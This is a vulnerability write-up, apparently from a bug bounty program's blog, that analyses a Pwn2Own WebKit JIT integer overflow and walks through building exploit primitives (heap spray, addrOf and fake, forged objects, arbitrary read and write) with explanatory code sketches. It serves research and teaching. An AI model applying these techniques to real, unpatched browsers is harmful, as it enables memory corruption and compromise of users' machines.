Diving Deep Into a Pwn2Own Winning WebKit Bug
November 26, 2019 | Ziad Badawi
Pwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the team of Fluoroacetate (Amat Cama and Richard Zhu) at this year’s Pwn2Own in Vancouver. It was a part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery.
Let’s start with the PoC:
First of all, we need to compile the affected WebKit version which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322.
svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan
Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens.
ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan
ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough
We are going to use lldb for debugging because it is already included with macOS. As the PoC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb. For jsc to be executed in lldb, its binary file needs to be called directly instead of the script run-jsc. This file is available at WebKitBuild/Release/jsc, and an environment variable is required for it to run correctly.
I should point out that env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release can be run within lldb, but placing it in a text file and passing that to lldb -s is the preferred method.
ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
r
Let’s start debugging.
It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT’ed code. We also notice that rsi, used as the index, contains 0x20000040. We have seen that number before in the PoC.
It is the size of bigarr (minus one)! That is essentially NUM_SPREAD_ARGS * sizeof(a).
In order to see the JIT’ed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc can dump compiled code in DFG and FTL.
ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js
This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code?
We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8. Why don’t we try searching for that address? It might lead to something relevant.
Bingo! Right in the DFG.
NewArrayWithSpread is used in the DFG JIT tier when creating a new array with the spread operator (...). This occurs in function f, which is generated by gen_func and called in a loop. The main reason for iterating ITERS times in f is to make that part of the code hot, causing it to be optimized by the DFG JIT tier.
Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp. This is where DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution.
We can understand that machine code by taking a look at compileNewArrayWithSpread. We see that compileAllocateNewArrayWithSize() is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR, is passed to emitAllocateButterfly() as its second argument, which means it will handle allocating a new butterfly (the memory space containing the values of a JS object) for the array. If you aren’t familiar with the butterfly of JSObject, more info may be found here.
Jumping to emitAllocateButterfly(), we see that the size parameter sizeGPR is shifted 3 bits to the left (multiplied by 8) and then added to the constant sizeof(IndexingHeader).
To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit field is of type JITCompiler.
DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked).
This means the calls you see, such as m_jit.move(), m_jit.add32(), etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart. We configure lldb with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations.
ZDIs-Mac:~ zdi$ cat ~/.lldbinit
settings set target.x86-disassembly-flavor intel
type format add --format hex long
type format add --format hex "unsigned long"
command script import lldb.macosx.heap
settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
settings set target.env-vars MallocStackLogging=1
settings set target.env-vars MallocScribble=1
Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such allocation.
ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
env MALLOC_PERMIT_INSANE_REQUESTS=1
r
JSC_dumpDFGDisassembly will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70 to get it in Intel flavor, which ends up as the following:
Let us try to match some code from emitAllocateButterfly(). Looking at the assembly listing, we can match the following:
It is time to see what the machine code is trying to do. We need to set a breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp before compilation. This helps a lot in breaking into JS code whenever we want. The compiler complained that exec in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec) function was not used, so the build failed. To get around that, we just added exec->argumentCount(); which should not affect execution.
Let’s add dbg() here, because the actual NewArrayWithSpread function will be executed during the creation of bigarr.
Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js again will dump the assembly and stop at:
This breaks exactly before the creation of bigarr, and you can see the machine code for NewArrayWithSpread. Let us put a breakpoint on the start of the function and continue execution.
The breakpoint is hit!
Before stepping through, let’s talk a little about what a JS object looks like in memory.
describe() is a nice little function that only runs in jsc. It shows us where a JS object is located in memory, its type, and a bit more, as displayed below:
Notice above how the arr_dbl object changes types from ArrayWithDouble to ArrayWithContiguous after adding an object. This is because its structure changed: it no longer stores only double values but multiple types.
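The type change can be reproduced with a few lines, sketched here under the assumption that the script is run in the jsc shell (where describe() and print() exist). The fallbacks for other engines are hypothetical stand-ins and print no indexing type.

```javascript
// describe() and print() exist only in the jsc shell; elsewhere fall back to
// stand-ins so the script still runs (the stand-in cannot show indexing types).
const show = typeof describe === 'function'
  ? describe
  : (v) => '(describe() unavailable) ' + JSON.stringify(v);
const log = typeof print === 'function' ? print : console.log;

const arr_dbl = [1.1, 2.2, 3.3];
log(show(arr_dbl)); // in jsc this is expected to report ArrayWithDouble

arr_dbl[0] = {};    // storing an object means the array can no longer hold raw doubles
log(show(arr_dbl)); // in jsc this is expected to report ArrayWithContiguous
```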
A JS object is represented in memory as follows:
Let’s start with the arr array in the example above. By dumping the object address 0x1034b4320, we see above two quadwords. The first is a JSCell and the second is the butterfly pointer.
The JSCell consists of
-- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of arr object. (4 bytes)
-- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte)
-- JSType m_type; # 0x21 (1 byte)
-- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte)
-- CellState m_cellState; # 0x1 (1 byte)
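To make the field layout concrete, here is a minimal sketch that splits a JSCell quadword into the fields listed above. decodeJSCell is a hypothetical helper, and the sample value is assembled from the example bytes in the list, assuming the little-endian layout on x86-64 with m_structureID in the low four bytes.

```javascript
// Split a 64-bit JSCell header (as a BigInt) into the fields listed above.
// Assumption: the quadword is read little-endian, so m_structureID occupies
// the low 32 bits and m_cellState the top byte.
function decodeJSCell(header) {
  const h = BigInt.asUintN(64, header);
  return {
    structureID: Number(h & 0xffffffffn),
    indexingType: Number((h >> 32n) & 0xffn),
    type: Number((h >> 40n) & 0xffn),
    flags: Number((h >> 48n) & 0xffn),
    cellState: Number((h >> 56n) & 0xffn),
  };
}

// Header built from the example field values: 0x5f, 0x05, 0x21, 0x8, 0x1.
const cell = decodeJSCell(0x010821050000005fn);
console.log(cell);
```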
The butterfly pointer points to the actual elements within the array.
The values 1,2,3,4,6 are shown here starting with 0xffff, as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5.
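The 0xffff prefix can be illustrated with a short sketch. It assumes the 64-bit JSValue encoding of this WebKit build, where an int32 is stored in the low 32 bits under a 0xffff tag in the top 16 bits; boxInt32 and toHex are hypothetical helper names.

```javascript
// Tag placed in the top 16 bits of an int32 JSValue (assumed encoding).
const TAG_INT32 = 0xffff000000000000n;

// Encode a 32-bit integer the way it would appear in the butterfly.
function boxInt32(n) {
  return TAG_INT32 | BigInt.asUintN(32, BigInt(n));
}

// Format a 64-bit value as a zero-padded hex quadword.
function toHex(v) {
  return '0x' + v.toString(16).padStart(16, '0');
}

const boxedElements = [1, 2, 3, 4, 6].map(boxInt32).map(toHex);
console.log(boxedElements.join('\n'));
```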
Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed.
This script will help for double-to-memory address conversion and vice versa.
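A minimal sketch of such conversion helpers follows, assuming an engine with BigInt and typed arrays. Only the name i2f appears in this post. The f2i name and the BigInt-based signatures are assumptions for illustration and may differ from the script used during the analysis.

```javascript
// Two views over the same 8 bytes: one as a double, one as raw 64-bit integer.
const scratch = new ArrayBuffer(8);
const asFloat = new Float64Array(scratch);
const asBits = new BigUint64Array(scratch);

// Integer bit pattern -> double with exactly those bits.
function i2f(bits) {
  asBits[0] = BigInt.asUintN(64, bits);
  return asFloat[0];
}

// Double -> its raw 64-bit pattern (for example, a leaked address).
function f2i(value) {
  asFloat[0] = value;
  return asBits[0];
}

console.log('0x' + f2i(i2f(0x4141414141410000n)).toString(16));
```

Bit patterns that decode to NaN may not survive a round trip on every engine, so exploit code usually avoids values in that range.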
This was a short intro but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo’s awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit.
Let’s continue stepping through the breakpoint.
All right, so, what is going on here?
Note this part from the PoC:
The mk_arr function creates an array with the first argument as size and second argument as elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008, which creates an array with size 0x4000008 and element values of 0x4141414141410000. The i2f function is for converting an integer to a float so that it ends up with the expected value in memory. LiveOverflow explains it well in his WebKit series.
Given that, we now know that rcx points to object a’s butterfly - 0x10 because its size is at rcx + 8, which makes the butterfly rcx + 0x10. Going through the rest of this code, we see that r8, r10, rdi, r9, rbx, r12, and r13 all point to a copy of object a (eight copies to be specific), and edx keeps adding the sizes of each.
Looking at edx, its value becomes 0x20000040.
So, what are those eight a copies? And what is the value 0x20000040?
Looking back at the PoC:
This means f becomes:
f creates an array by spreading NUM_SPREAD_ARGS (8) copies of the first argument and a single copy of its second argument. f is called with objects a (8 * 0x04000008) and c (length 1). When NewArrayWithSpread gets called, it makes room for those 8 a’s and 1 c.
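The shape of f can be sketched as follows. This is a scaled-down reconstruction from the description above, not the original PoC: the gen_func signature and the tiny array sizes are assumptions, chosen so the script is safe to run anywhere.

```javascript
const NUM_SPREAD_ARGS = 8;

// Build and compile f(a, c) => [...a, ...a, (8 times in total), ...c].
// Hypothetical signature; the PoC's gen_func may be written differently.
function gen_func(numSpreadArgs) {
  const spreads = new Array(numSpreadArgs).fill('...a').join(', ');
  return new Function('a', 'c', `return [${spreads}, ...c];`);
}

const f = gen_func(NUM_SPREAD_ARGS);

// Small stand-ins for the PoC's huge array a and one-element array c.
const a = new Array(4).fill(1.1);
const c = [2.2];

const result = f(a, c);
console.log(result.length); // NUM_SPREAD_ARGS * a.length + c.length
```

With the PoC's real sizes, the same expression asks for 8 * 0x4000008 + 1 elements, which is the length that edx accumulates.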
The last step through shows the length of object c, which makes the final edx value 0x20000041.
The next step should be the allocation of that length, which happens inside emitAllocateButterfly().
We notice the overflow that occurs at shl r8d, 0x3, where 0x20000041 gets wrapped around to 0x208. The allocation size becomes 0x210 when it gets passed to emitAllocateVariableSized().
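The wraparound is easy to check by hand. The sketch below mirrors the 32-bit arithmetic described above, assuming sizeof(IndexingHeader) is 8 (which is what turns 0x208 into 0x210). butterflyAllocSize32 is a hypothetical name.

```javascript
const SIZEOF_INDEXING_HEADER = 8; // assumption consistent with 0x208 -> 0x210

// Mirror of the emitted 32-bit math: (length << 3) + sizeof(IndexingHeader).
function butterflyAllocSize32(length) {
  const shifted = (length << 3) >>> 0; // like shl r8d, 3: bits above 32 are lost
  return (shifted + SIZEOF_INDEXING_HEADER) >>> 0;
}

const length = 8 * 0x4000008 + 1;                        // 0x20000041
const allocSize = butterflyAllocSize32(length);          // what gets allocated
const intended = length * 8 + SIZEOF_INDEXING_HEADER;    // what was needed

console.log(length.toString(16), allocSize.toString(16), intended.toString(16));
```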
The out-of-bounds write access violation we see happens in the following snippet on mov qword ptr [rcx + 8*rsi], r8. What this snippet does is iterate the newly created butterfly backwards using the incorrect length 0x20000041, while the real allocation size is 0x210 after the overflow. It zeros out each element, but since the actual allocation in memory is far smaller than 0x20000041 elements, it hits an out-of-bounds access violation in the ASAN build.
The Primitives
This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value thus enabling the creation of an undersized butterfly. This would trigger a heap overflow later when data gets written to it, so other arrays in its vicinity will get corrupted. We are planning on doing the following:
- Spray a bunch of arrays
- Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays
- Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects
The following snippet shows the spray. When f() is called, the integer overflow will trigger when creating a butterfly with length 0x20000041, thus producing an undersized one because of the wraparound. However, 0x20000041 elements will be written nonetheless, leading to a heap overflow. When c is accessed, the getter defined on its first element will fire and fill the spray array with 0x4000 elements of newly created arrays from the slice() call.
The large number of butterflies created in spray and the huge length of bigarr’s butterfly are bound to overlap at some point, both because of the heap overflow and because butterflies are created in the same memory space. After executing the PoC in a non-ASAN release build, we get the following.
We notice how the butterfly of one of spray’s objects (that are either spray_arr or spray_arr2) towards the end was overlapped by bigarr.
The following might help in visualizing what is going on.
It is important to note here the types of spray_arr and spray_arr2, as they are necessary for constructing the exploit primitives. They are ArrayWithDouble and ArrayWithContiguous respectively. An array of type ArrayWithDouble contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous is different, as it treats its elements as boxed JSValues, so it reads and writes JS objects.
The basic idea is finding a way to write an object to the ArrayWithContiguous array (spray_arr2) and then read its memory address from the ArrayWithDouble array (spray_arr). The same is true vice versa, where we write a memory address to spray_arr and read it as an object using spray_arr2.
In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr and spray_arr2.
Let us take a look at the following:
This snippet loops over spray, specifically the ArrayWithDouble instances (spray_arr), and breaks when it finds the first space overlapped with bigarr, thus returning its index in spray, oobarr_idx, and a new object, oobarr, pointing to that space. The main condition to satisfy for breaking is spray[i].length > 0x40. When spray[i] points to the bigarr data, which consists of 0x4142414141410000, its length will be located 8 bytes back, which is also 0x4142414141410000. This makes the length 0x41410000, which is > 0x40. What is oobarr? It is an array of type ArrayWithDouble pointing to the beginning of the overlapped space between spray and bigarr. Reading oobarr[0] should return 0x4142414141410000. The oobarr array is the first one we can use in order to read and write object addresses.
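The length check can be sketched in isolation. The code below assumes that the array length lives in the low 32 bits of the quadword located 8 bytes before the butterfly, which is what turns 0x4142414141410000 into 0x41410000. publicLengthOf, findOverlapped, and the mock spray are hypothetical and only stand in for the real corrupted heap.

```javascript
// Length as seen by JS: low 32 bits of the header quadword (assumed layout).
function publicLengthOf(headerQword) {
  return Number(BigInt.asUintN(64, headerQword) & 0xffffffffn);
}

// Return the index of the first array whose length no longer looks sane.
function findOverlapped(spray) {
  for (let i = 0; i < spray.length; i++) {
    if (spray[i].length > 0x40) return i;
  }
  return -1;
}

const corruptedLength = publicLengthOf(0x4142414141410000n);
console.log(corruptedLength.toString(16), corruptedLength > 0x40);

// Mock spray: two untouched arrays and one with an oversized length.
const mockSpray = [
  new Array(4).fill(1.1),
  new Array(4).fill(1.1),
  new Array(0x50).fill(1.1),
];
const oobarr_idx = findOverlapped(mockSpray);
```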
contarr is an array of type ArrayWithContiguous pointing to a space that is shared with oobarr. The following shows the snippet executed:
The following shows both addrOf and fake primitives. The addrOf primitive is used to return an address of any JS object by writing it to the ArrayWithContiguous array and reading it from the ArrayWithDouble array as a float. The fake primitive is the opposite. It is used to create a JS object from a memory address by writing the address to ArrayWithDouble and reading from ArrayWithContiguous.
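The idea behind the two primitives can be modeled without any memory corruption. The toy below is only an analogy: a Map plays the role of the heap, made-up addresses stand in for real pointers, and two typed-array views over one 8-byte slot stand in for oobarr and contarr sharing the same storage. Every name other than addrOf and fake is hypothetical.

```javascript
// Toy heap: every "object" gets a made-up address.
const heap = new Map();      // address (BigInt) -> object
const addresses = new Map(); // object -> address (BigInt)
let nextAddress = 0x100000000n;

function allocate(obj) {
  heap.set(nextAddress, obj);
  addresses.set(obj, nextAddress);
  nextAddress += 0x10n;
  return obj;
}

// One 8-byte slot seen through two views, like the overlapped butterflies.
const slot = new ArrayBuffer(8);
const asDouble = new Float64Array(slot);     // how the double array sees it
const asPointer = new BigUint64Array(slot);  // how the contiguous array sees it

// Store the object (its pointer) through one view, read a double from the other.
function addrOf(obj) {
  asPointer[0] = addresses.get(obj);
  return asDouble[0];
}

// Store a double through one view, read back an object from the other.
function fake(addrAsDouble) {
  asDouble[0] = addrAsDouble;
  return heap.get(asPointer[0]);
}

const target = allocate({ name: 'target' });
console.log(fake(addrOf(target)) === target);
```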
It is clear in the debugger output that both primitives work as expected.
The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store data in their butterfly if they are not inline. This looks like (from Filip Pizlo's talk):
Check out the following:
We create an empty array (length 0) with a single property, p0, containing a string. Its memory layout is shown below. When we look at butterfly - 0x10, we see the quadwords for length and the first property. Its vector length is 0, while the property points to 0x1034740a0. It should be clear by now that in order to access a property in an object, we get the butterfly then subtract 0x10. What happens if we control the butterfly? Well, arbitrary read and write happens.
For any JS object to be valid in memory, its JSCell must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell.
The following snippet sprays 0x400 a objects so we can predict a value between 1 and 0x400 for its structure ID.
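One common way to write such a spray is sketched below. It is not necessarily how the PoC does it: the per-object unique property name is an assumption, relying on JavaScriptCore creating a new structure whenever a not-yet-seen property is added to an object.

```javascript
// Spray 0x400 arrays, each with its own uniquely named property, so that
// each one is expected to receive a fresh structure (assumed technique).
const struct_spray = [];
for (let i = 0; i < 0x400; i++) {
  const a = [13.37];
  a['prop_' + i] = 1; // unique name -> structure transition
  struct_spray.push(a);
}

console.log(struct_spray.length.toString(16));
```

Structure IDs are engine-internal and cannot be observed from plain JavaScript, so this sketch only shows the shape of the spray, not the resulting IDs.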
We need to create a victim object that we control. Take a look at the following: mngr is the middle object in struct_spray, and we create victim, making sure it resides in the address range after mngr’s address.
We are going to use the outer object to create the fake object hax. The first property a is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200, which means 0x200 is the structure ID we predicted. The - (1<<16) part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b property will be the butterfly of the fake object. To create hax, we get the outer address and then add 0x10 to it. We then feed the result to fake that was created earlier. The object’s layout is shown in lldb output below.
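As an aside on the boxing adjustment mentioned above, the arithmetic can be checked with a short sketch. It assumes only what the text states, namely that storing a double as a boxed value adds 2^48 to its bit pattern. boxedBits and DOUBLE_ENCODE_OFFSET are hypothetical names.

```javascript
const DOUBLE_ENCODE_OFFSET = 1n << 48n; // the 2^48 added when a double is boxed

// Bit pattern that ends up in memory when a double with rawBits is boxed.
function boxedBits(rawBits) {
  return BigInt.asUintN(64, rawBits + DOUBLE_ENCODE_OFFSET);
}

const wantedCell = 0x0108200700000200n;             // JSCell we want in memory
const toStore = wantedCell - DOUBLE_ENCODE_OFFSET;  // value to hand to the engine

console.log('0x' + toStore.toString(16).padStart(16, '0'));
console.log(boxedBits(toStore) === wantedCell);
```

The same offset would turn the 0x4141414141410000 element value into the 0x4142414141410000 pattern seen in bigarr, if bigarr holds boxed values.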
When accessing an index of hax, it means we are accessing the memory space starting from mngr’s address shown below. Since objects are located in the same space and victim was created last, it is located after mngr. Subtracting mngr_addr from victim_addr, we can reach victim’s JSCell and butterfly (+8) when indexing the result in hax.
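The index arithmetic can be sketched as follows, assuming each element of hax covers 8 bytes starting at mngr’s address. The addresses are made up for illustration, and haxIndexFor is a hypothetical helper.

```javascript
// Index into hax that lands on a given address, assuming hax[0] maps to
// mngr's address and every element is 8 bytes wide.
function haxIndexFor(targetAddr, mngrAddr) {
  return Number((targetAddr - mngrAddr) / 8n);
}

// Hypothetical addresses, not taken from the debugger output.
const mngr_addr = 0x1000n;
const victim_addr = 0x1040n;

const cellIndex = haxIndexFor(victim_addr, mngr_addr);            // victim's JSCell
const butterflyIndex = haxIndexFor(victim_addr + 8n, mngr_addr);  // victim's butterfly

console.log(cellIndex, butterflyIndex);
```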
Let's achieve arbitrary read/write:
As we mentioned previously, when accessing victim.p0, its butterfly is fetched then goes backwards 0x10 in order to grab its first property. set_victim_addr sets victim’s butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger.
Looking at the dump above, we notice that originally, victim’s butterfly was 0x18014e8028. Later, it became 0x18003e4030, which is actually test’s address plus 0x18. When read64 is called, it is passed test’s address plus 8 since we are trying to read its butterfly. Within set_victim_addr, another 0x10 is added to the address. When victim.p0 is read, its butterfly 0x2042fc058 is fetched, then 0x10 is subtracted. This results in 0x2042fc048, which actually points to test’s butterfly. victim.p0 actually fetches the value that is pointed to by the property address (0x18003e4030 in this case). Adding an addrOf() to that will get us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar, as shown in write64, where we write a value to victim.p0 using fake().
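The +0x10 / -0x10 bookkeeping can be modeled with a toy memory. In the sketch below a Map stands in for process memory and a plain field stands in for victim’s butterfly. The real exploit writes the butterfly through hax and wraps values with addrOf() and fake(), which this model leaves out. read_p0, write_p0, and memory are hypothetical names.

```javascript
const memory = new Map();          // address (BigInt) -> 64-bit value (BigInt)
const victim = { butterfly: 0n };  // stand-in for victim's butterfly pointer

// Point the butterfly 0x10 past the target so that p0 lands on the target.
function set_victim_addr(addr) {
  victim.butterfly = addr + 0x10n;
}

// Property p0 lives 0x10 bytes before the butterfly.
function read_p0() {
  return memory.get(victim.butterfly - 0x10n);
}

function write_p0(value) {
  memory.set(victim.butterfly - 0x10n, value);
}

function read64(addr) {
  set_victim_addr(addr);
  return read_p0();
}

function write64(addr, value) {
  set_victim_addr(addr);
  write_p0(value);
}

memory.set(0x2000n, 0x1234n);
console.log(read64(0x2000n).toString(16));
write64(0x2008n, 0x42n);
```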
Neat, right?
Conclusion
I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb and walking through WebKit looking for bugs. If you find any, you know where to send them. 😀
You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches.